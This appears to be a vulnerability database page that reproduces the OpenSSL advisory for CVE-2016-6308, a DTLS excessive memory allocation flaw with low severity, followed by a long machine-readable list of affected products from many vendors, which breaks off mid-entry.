Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0348", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.12.16" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "node.js", "scope": null, "trust": 0.8, "vendor": "node js", "version": null }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.1.0" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "node.js", "scope": "eq", "trust": 0.6, "vendor": "nodejs", "version": "6.6.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "project openssl 0.9.8zg", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "project openssl 1.0.2i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.6.0.0" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl b-36.8", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.2.1.1" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "policycenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.20" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.1.0" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.10" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.0" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "project openssl 1.0.0s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.14" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", 